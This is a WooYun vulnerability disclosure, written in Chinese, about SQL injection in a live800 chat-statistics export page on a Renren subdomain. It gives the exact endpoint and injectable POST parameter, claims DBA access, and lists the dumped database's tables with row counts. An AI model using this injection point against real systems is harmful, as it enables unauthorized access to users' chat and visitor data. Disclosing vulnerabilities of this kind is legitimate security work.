当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0222273

漏洞标题:人人网某处SQL注入影响大量数据

相关厂商:人人网

漏洞作者: 路人甲

提交时间:2016-06-23 12:21

修复时间:2016-06-24 12:19

公开时间:2016-06-24 12:19

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-06-23: 细节已通知厂商并且等待厂商处理中
2016-06-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

http://live800.wan.renren.com:80/live800//sta/export/chatOpSta.jsp (POST)
export=txt&companyId=1&subStrSql=*


398.png


dba权限

399.png


Database: live800_im
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| visitor_access | 15081675 |
| operator_status | 633129 |
| chat_topic | 616252 |
| live800_system | 410676 |
| chat_content | 289363 |
| chat_sta | 289308 |
| chat_info | 285963 |
| leaveword_topic | 161506 |
| trustful_visitor | 78942 |
| leaveword | 74624 |
| contact | 71702 |
| cookie_contact | 71702 |
| company_config_data | 69254 |
| lost | 51034 |
| sync_info | 23170 |
| op_chat_content | 7200 |
| daily_flow_capacity | 1329 |
| sys_operate_log | 1266 |
| faq | 115 |
| operator | 82 |
| privilege | 82 |
| company_config | 36 |
| user_defined_button | 18 |
| company_ui_config | 16 |
| config_template | 12 |
| user_invite | 12 |
| company_skill | 11 |
| ad_column | 10 |
| routing_action | 6 |
| chat_config | 4 |
| leaveword_box | 3 |
| notify | 3 |
| routing_condition | 3 |
| routing_policy | 3 |
| routing_rule | 3 |
| canned_url | 1 |
| company | 1 |
| company_style | 1 |
| customization | 1 |
| fuf | 1 |
| ip_prohibit | 1 |
| operator_account | 1 |
+---------------------+---------+

漏洞证明:

398.png

修复方案:

改改改

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-06-24 12:19

厂商回复:

忽略

最新状态:

暂无


漏洞评价:

评价

  1. 2016-06-23 13:45 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    又有新裤子出来了。。

  2. 2016-06-23 16:26 | _Thorns ( 普通白帽子 | Rank:1754 漏洞数:269 | 以大多数人的努力程度之低,根本轮不到去拼...)

    ......跟我的重复了